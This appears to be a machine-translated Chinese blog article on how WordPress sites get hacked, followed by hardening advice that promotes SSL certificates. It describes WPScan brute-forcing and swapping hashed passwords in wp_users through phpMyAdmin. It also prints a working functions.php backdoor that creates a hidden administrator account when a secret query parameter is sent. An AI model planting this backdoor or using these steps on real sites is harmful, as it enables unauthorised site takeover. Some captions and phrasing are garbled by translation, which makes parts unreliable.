如何破解WordPress？

如何破解WordPress](introduction.png)

介绍

在开始这篇文章之前，我们想让你知道，黑客攻击是非法的，我们不鼓励任何恶意的活动。这篇文章只是为了让你了解骗子是如何工作的，以及各种网站安全方法对防止他们的危害是多么重要。我们来讨论一下。

• 骗子是如何入侵WordPress的？
• 如何保护你的WP网站不受骗子攻击？

所以，不用再多说了，让我们开始讨论这个话题。

如何在网上黑掉WordPress网站？

！如何在线破解WordPress网站 (Source:wpsecurityninja.com)

###使用WPScan。 WPScan是一个WP安全扫描器，可以帮助网站所有者检查他们的WordPress网站是否有漏洞，但这个扫描器也被黑客利用来实现他们黑掉网站的动机。

WPScan允许网站所有者和管理员指定WP用户账户和暴力破解密码，是获得未经授权访问WP账户的首要步骤。

(使用WPScan暴力破解用户名和密码。源于此。Medium)

MIM攻击。

在用户使用类似局域网的情况下，中间人（MIM）攻击可以很容易地进行。非加密的用户登录是一个软目标，因为所有的细节都可以通过纯文本看到。

参与进行这些类型的攻击的软件可以发现被破坏的主题、插件并可以列举用户。

(来源：《中国新闻周刊》。Medium)

SQL注入。

SQL注入攻击被认为是用于渗透网站的最突出攻击。这些攻击的目标是网站的后台网关，并允许黑客通过实施妥协的命令来渗透它们。

(来源:[secure.wphackedhelp.com]（https://secure.wphackedhelp.com/blog/hack-wordpress-website/#How_To_Hack_A_WordPress_Website_8211_Various_Ways）)

这些渗透还允许黑客修改数据库和命令，删除或窃取网站信息。

由于这些SQL攻击发现了易受攻击和未打补丁的网站，它们使黑客的任务变得容易和成功。

###利用我的SQL/cPanel。

在这种方法中，黑客创建一个假账户或修改当前WP网站用户的密码。黑客试图通过打开PhpMyAdmin来渗透到cPanel。他们在寻找以_users结尾的表，并找到他们想要修改的用户。

这将允许他们改变他们计划入侵的用户的凭证。他们通过打开在线MD5生成器追踪用户并改变用户的密码（来自user_pass字段），并将其替换为他们想要的密码，然后点击#。

! 利用我的SQL/cPanel (用户名、用户的哈希密码、他们的电子邮件ID等都存储在wp_users数据库表中。源于此。firstsiteguide.com)

用户名、用户的哈希密码、他们的电子邮件ID等都存储在wp_users数据库表中。

###编辑Functions.php。

黑客也会进入cPanel来修改Functions.php文件。通过解锁文件管理器，他们寻找活动主题的文件夹。 从public_html/wp_content/themes文件夹中，他们追踪主题，并通过放置他们破坏的代码来编辑 functions.php。由于黑客已经创建了一个新的账户，所以黑客已经在进行中了。一旦完成，他们就会擦除被破坏的代码。

通过FTP创建一个新的用户账户。

一般来说，FTP账户帮助网站所有者在其网站内生成一个目录，允许特定的用户使用其登录凭证上传/下载他们的文件。

这些文件也可以在互联网上查看。

> 在网站上创建一个FTP账户的步骤：。 > > - 输入所需的数据 > - 输入新的FTP用户的用户名 > - 输入用于分配账户的密码，以便通过FTP访问 > - 输入用于通过FTP访问的目录名称 > - 写下您希望分配给该文件夹的所需MB空间。 > - 然后按*"创建 "*按钮创建新帐户。

新用户必须加载以下数据才能通过FTP获得访问权。

地址/主机名/地址：yourdomain.com或ftp.yourdomain.com

用户/用户：[email protected]

密码：分配给这个FTP账户的El密码

端口：21 命名用于上传/下载文件的文件夹。

新用户将对所选目录及其包含的所有子目录拥有读写权限。

例如，如果你创建了客户用户，并给他访问/home / user / public_html的权限

通过后门渗透。

渗透网站的恶意方式是通过后门。无论是想进入你的网站的诈骗者，还是想通过后门进入重新获得网站访问权的受害用户，他们都需要遵循以下步骤。

在某些情况下，当通过FTP创建一个新的用户账户或进行密码重置时，但没有得到理想的结果，用户可能想通过后门进入黑掉他们的网站，找回他们的管理权限。

创建后门的步骤：

• 打开 functions.php 文件并粘贴下面的代码。

add_action('wp_head', 'wploop_backdoor'); 
function wploop_backdoor() {
If ($_GET['backdoor'] == 'knockknock') {
require('wp-includes/registration.php');
If (!username_exists('username')) {
$user_id = wp_create_user('name', 'pass');
$user = new WP_User($user_id);
$user->set_role('administrator');
}
}
}
?>

• 稍后保存更改。

加密货币劫持和加密货币开采。

加密货币的流行催生了新的网络威胁，如crypto-jacking，它也被称为加密货币采矿恶意软件。

违背用户的意愿以及意识而没收计算机的行为被称为加密劫持。在加密劫持恶意软件中，骗子通过软件传递的恶意软件感染用户的计算机，以破坏系统和网络。

网络钓鱼。

网络钓鱼是一种方法，欺诈者通过冒充合法实体欺骗用户的敏感信息（登录凭证、社会账户号码、密码、信用卡详细信息等）。他们通常借助于电子邮件来实现其目的。

> **例子：**骗子可能冒充可靠的来源，从用户那里收集个人资料，以满足他们的愿望。 > 他们还可能在钓鱼邮件中放置一个坏链接，并将他们引向一些欺诈性网站以传递恶意软件。

恶意软件。

*WordPress安全统计表明，有4000个WP网站由于假的SEO插件而被恶意软件感染。

骗子们不需要一个源头来传递恶意软件。SEO插件、WP主题以及网站中存在的许多其他因素都促使黑客使用最近的WP-VCD恶意软件。

甚至钓鱼邮件也是传递恶意软件的门路。

在这里，黑客的座右铭也是一样的，即通过渗透系统和窃取信息获得用户的敏感数据。

WordPress勒索软件。

在WP勒索软件中，黑客使用恶意软件来阻止用户访问系统和网络。用户可以通过支付黑客所要求的赎金来恢复这些数据。 > 例子： Petya攻击，黑客对你的文件和数据进行加密，并对解密密钥要求赎金。

跨站脚本（XSS）攻击。

XSS攻击是由黑客通过向网站注入恶意内容，从而利用浏览器来进行的。这种攻击允许黑客从cookies中窃取数据，修改网站内容，并抓住网站获取敏感数据。

###点击劫持。 在点击劫持中，黑客恶意地试图破坏一个按钮/链接，并促使用户点击被破坏的对象。 这允许黑客执行恶意命令，以获取用户的敏感数据。

欺骗。

欺骗是一种攻击，在这种攻击中，某人将自己伪装成一个值得信赖的身份，以获得用户的非法利益，欺骗他们提交他们的机密信息。

为了防止所有这些黑客攻击，需要采取具体的安全措施来保护你的WP网站。

如何保护WordPress网站免受黑客攻击？

！如何保护WordPress网站免受黑客攻击？ (来源:envisaged digital.co.uk)

以上的统计数据足以说明WordPress的受欢迎程度。正是这种受欢迎程度使得这个CMS平台在黑客中更受欢迎，他们尝试各种黑客方法来获取WP网站和他们的数据。

因此，了解如何防止黑客访问你的WP网站是非常重要的。

###用SSL证书保护你的WP网站。

当任何数据被加载到网站上时，它总是以纯文本形式存在，包括黑客在内的所有人都很容易看到。这可能是有风险的，因为黑客可以滥用你的网站数据。

SSL *（安全套接字层）*证书是那些有助于用256位加密安全保护你的WP网站的数字证书，从而将你的网站数据转换为编码格式。

黑客虽然获得了对你网站的访问权，但却无法读取代码，因此他们被迫离开这样的网站。

用SSL证书保护你的WP网站](ssl.jpg) (来源：《中国新闻周刊》。clickssl.net)

选择你想要的SSL证书品牌（Comodo、Thawte、RapidSSL等）并在你的WP网站上安装相同的证书。就SSL证书的类型而言，你需要了解域名和子域名。例如，如果你的WP网站有子域，那么，一个便宜的通配符证书大约只需要*45美元/年，就可以保证你的整个数字业务。

快速签发、2048位密钥加密、促进搜索引擎优化、网站信任印章、99%的浏览器/移动设备兼容性、退款政策和保修是安装野卡SSL证书的一些特点和好处。

SSL产品的各种品牌和选择、预算友好的价格和优秀的客户服务是接近ClickSSL商店以确保WP网站安全的几个好处。

###更新你的雇员。

人为的错误可能是灾难性的，所以一定要确保让你的员工了解最新的网络威胁，避免他们受到伤害。

如果你的员工能够在初始阶段追踪到黑客网站的可疑信号，他们可以通知有关方面，防止你的网站和业务受到进一步的损害。

使用双因素认证（2FA）。

在网站登录过程中实施2FA是抵御蛮力攻击的最关键的方法。除了增加另一个安全层，它们还可以防止网站和用户数据。

这是因为如果一个安全层被破坏，诈骗者需要入侵第二层来获得网站的访问权。

这是一个艰难的决定，因此在大多数情况下，诈骗者最终会转移到其他安全性差的网站。

> 提示： WP 2FA是一个免费的WP插件，为你的WP网站提供一个额外的安全层。

定期审计管理员用户。

这对你的WP网站的安全非常重要。确保定期审核您的管理用户，并交叉检查他们的访问权限。

同时确保你的用户以及员工根据他们的任务拥有有限的访问权限，以防止安全漏洞。

定期更新WordPress核心。

不了解WP核心？

让我告诉你，WP核心包括所有WP工作所需的基本基础文件。

从WordPress.org下载的WP压缩文件中的文件列表

(Source:ithemes.com)

这些核心文件需要在安全更新发布后定期更新，以修补所有的安全漏洞。

从值得信赖的来源下载WP主题和插件。

这是至关重要的，因为当插件没有更新或从不可信的来源安装时，它们可能会很危险。在使用免费/付费插件的情况下，一定要检查以下所述的因素，如。

• 用户评级和评论
• 用户友好度
• 兼容性
• 安全性
• 可信度

下载值得信赖的WP主题和插件](image11.png) (Source:torquemag.io)

这条规则也适用于安装WP主题。

###定期更新WP主题和插件。

过时或过期的WP主题和插件总是对你的WP网站构成威胁，因为它们的安全标准已经丧失了。为了防止黑客利用这种途径传播恶意软件来获取网站访问权，请确保定期更新您的WP网站中使用的主题和插件。

这将有助于插件的正常运行，并与最新版本的WP保持同步。

> **提示：**在插件页面，您可以查看所有已安装的插件，以及每个插件旁边的 "启用自动更新 "链接。把它打开，以便自动更新。

###修改默认的管理员名称。

黑客太聪明了，他们可以通过使用默认的管理名称轻松地渗透到你的WP网站。最好是修改默认的管理用户名，以防止黑客执行暴力攻击以获得对你网站的未经授权的访问。

授予有限的访问权。

永远不要给予超过必要的权限，同样的规则也适用于授予用户以及雇员的网站权限。

访问控制是网站和数据安全的首要规则，因为它定义了谁能或不能访问网站。为了网站的安全，封锁WP管理和其他关键代码和数据的所有入口。

限制访问不仅能提高生产力，而且还能保证你的网站不被恶意进入。

###更新WordPress。

当你的WordPress没有更新时，你的网站就有被黑客入侵的风险。

WordPress占据了37%的市场份额，而且它不断地定期发布更新，以修复安全漏洞和错误。这些更新还包括新的功能和对现有功能的改进，这对提高你的网站性能很有用。

为什么你应该经常更新你的WordPress](update-wordpress.png) (来源：《中国新闻周刊》。wpbeginner.com)

保持你的WP网站更新，以获得强大的安全性。

总结。

使用强大而复杂的密码，保持你的WP网站以及插件和主题的更新，以修复所有的安全漏洞。花时间教育你的员工，因为这总是有助于预防灾难。

永远不要在安全问题上松懈，并始终确保使用最好的和值得信赖的安全插件，以保持你的WP网站安全不受窥视。此外，用SSL保护你的网站，以提高客户的信任，业务和[SEO]（/blog/what-is-seo/）。

现在你已经知道了黑客是如何运作的，我们希望这篇文章能帮助你防止黑客渗透到你的网站，并以安全的方式管理你的WP网站。